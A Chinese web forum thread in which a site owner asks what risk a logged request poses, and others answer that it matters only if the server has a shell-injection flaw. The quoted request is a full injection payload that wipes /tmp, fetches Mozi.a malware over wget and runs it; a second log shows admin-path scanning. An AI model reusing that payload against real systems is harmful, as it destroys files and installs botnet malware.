网站收到这样的请求有什么风险？

ibmall · 发表于 2019-12-19 12:25:15

网站访问日志有一条这样的内容，请教大佬，有什么实际的风险吗？

GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

ckqf · 发表于 2019-12-19 12:34:43

没风险，这个地址你打开估计就是个404页面。

ibmall · 发表于 2019-12-19 12:42:14

ckqf 发表于 2019-12-19 12:34

没风险，这个地址你打开估计就是个404页面。
好的，
还有个疑问，通过这种方式真的能执行shell命令？

ckqf · 发表于 2019-12-19 12:34:00

ibmall 发表于 2019-12-19 12:42

好的，
还有个疑问，通过这种方式真的能执行shell命令？
有shell注入漏洞的才会有风险。

pulpfunction · 发表于 2019-12-19 12:44:45

dj有这种网页的在线维护模式吗，flask是能把这个功能关了

ibmall · 发表于 2019-12-19 12:42:00

ckqf 发表于 2019-12-19 12:44

有shell注入漏洞的才会有风险。
好的，多谢大佬。

ibmall · 发表于 2019-12-19 12:48:37

pulpfunction 发表于 2019-12-19 12:48

dj有这种网页的在线维护模式吗，flask是能把这个功能关了
这个我还不知道，我去查查

把你的友链放上了，暂时就那个位置，还没考虑好以后怎么布局合适。

pulpfunction · 发表于 2019-12-19 12:51:13

ibmall 发表于 2019-12-19 13:53

这个我还不知道，我去查查

把你的友链放上了，暂时就那个位置，还没考虑好以后怎么布局合适。 ...
不急啊大哥我那都没有流量哈哈，flask是运行错误能输密码进入Python shell .. 这个请求是不是直接找shell.php .html什么的执行命令也没见过这种网页输命令行的程序

ibmall · 发表于 2019-12-19 12:44:00

pulpfunction 发表于 2019-12-19 12:57

不急啊大哥我那都没有流量哈哈，flask是运行错误能输密码进入Python shell .. 这个请求是不是直接找sh ...
嗯，流量慢慢就有了。

每天都有不少找 xxx.php 的请求，这个倒是不担心，网站一个php文件都没有

[17/Dec/2019:17:09:00] "GET /admin/" 302 -
[17/Dec/2019:17:09:00] "GET /" 200 14176
[17/Dec/2019:17:09:02] "GET /shop/admin/" 200 5648
[17/Dec/2019:17:09:03] "GET /store/admin/" 200 5648
[17/Dec/2019:17:09:04] "GET /magento/admin/" 200 5648
[17/Dec/2019:17:09:06] "GET /magento2/admin/" 200 5648
[17/Dec/2019:17:09:07] "GET /pub/errors/503.php" 200 5648
[17/Dec/2019:17:09:08] "GET /shop/pub/errors/503.php" 200 5648
[17/Dec/2019:17:09:09] "GET /store/pub/errors/503.php" 200 5648
[17/Dec/2019:17:09:10] "GET /magento/pub/errors/503.php" 200 5648
[17/Dec/2019:17:09:11] "GET /magento2/pub/errors/503.php" 200 5648

ibmall · 发表于 2019-12-19 12:53:27

被扫了不用管

ibmall 发表于 2019-12-19 14:26

嗯，流量慢慢就有了。

每天都有不少找 xxx.php 的请求，这个倒是不担心，网站一个php文件都没有
要不就到get方式的接口，我回去也把wp登录改了

		自动登录	找回密码
密码			立即注册